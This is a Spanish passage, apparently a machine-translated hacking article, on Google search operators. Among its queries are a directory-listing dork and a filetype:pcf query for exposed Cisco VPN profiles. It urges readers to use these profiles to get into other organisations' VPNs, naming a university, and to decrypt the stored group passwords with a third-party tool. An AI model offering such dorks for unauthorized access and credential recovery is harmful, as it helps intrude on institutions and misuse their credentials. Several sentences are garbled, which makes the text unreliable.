Las herramientas de automatización de Google están diseñadas para hacer la vida más fácil, pero a menudo añaden problemas. Por ejemplo, la ciudad del usuario está determinada por la IP del usuario a través de WHOIS. Basándose en esta información, Google no sólo equilibra la carga entre servidores, sino que también cambia los resultados de búsqueda. Dependiendo de la región, para la misma solicitud, aparecerán diferentes resultados en la primera página y algunos de ellos pueden estar completamente ocultos. El código de dos letras después de la directiva gl=country le ayudará a sentirse cosmopolita y a buscar información de cualquier país. Por ejemplo, el código de Holanda es NL, pero el Vaticano y Corea del Norte no tienen código propio en Google.

A menudo, los resultados de búsqueda terminan saturados incluso después de utilizar varios filtros avanzados. En este caso, es fácil aclarar la solicitud agregándole varias palabras de excepción (se coloca un signo menos delante de cada una de ellas). Por ejemplo, banca, nombres y tutorial se suelen utilizar con la palabra Personal. Por lo tanto, los resultados de búsqueda más limpios no se mostrarán mediante un ejemplo de consulta de libro de texto, sino mediante uno refinado:

Título:"Índice de /Personal/" -nombres -tutorial -banca

Un último ejemplo

Un hacker sofisticado se distingue por el hecho de que él mismo se proporciona todo lo que necesita. Por ejemplo, una VPN es algo cómodo, pero caro o temporal y con restricciones. Registrarse para obtener una suscripción es demasiado costoso. Es bueno que existan suscripciones grupales y con la ayuda de Google es fácil formar parte de un grupo. Para hacer esto, simplemente busque el archivo de configuración de Cisco VPN, que tiene una extensión PCF bastante no estándar y una ruta reconocible: Archivos de programa\Cisco Systems\VPN Client\Profiles. Una petición y te unirás, por ejemplo, al amable equipo de la Universidad de Bonn.

Tipo de archivo: pcf vpn OR Grupo

INFORMACIÓN Google encuentra Archivos de configuración con contraseñas, pero muchas de ellas están escritas en forma cifrada o reemplazadas con hashes. Si ve cadenas de longitud fija, busque inmediatamente un servicio de descifrado.

Las contraseñas se almacenan cifradas, pero Maurice Massard ya ha escrito un programa para descifrarlas y lo proporciona de forma gratuita a través de thecampusgeeks.com.

En ayuda de google cientos son ejecutados diferentes tipos Ataques y pruebas de penetración. Hay muchas opciones que afectan programas populares, formatos básicos de bases de datos, numerosas vulnerabilidades de PHP, nubes, etc. Si sabes exactamente lo que estás buscando, será mucho más fácil conseguirlo. Información necesaria(especialmente uno que no estaba previsto que se hiciera público). Shodan no es el único que se alimenta de ideas interesantes, ¡sino todas las bases de datos de recursos de red indexados!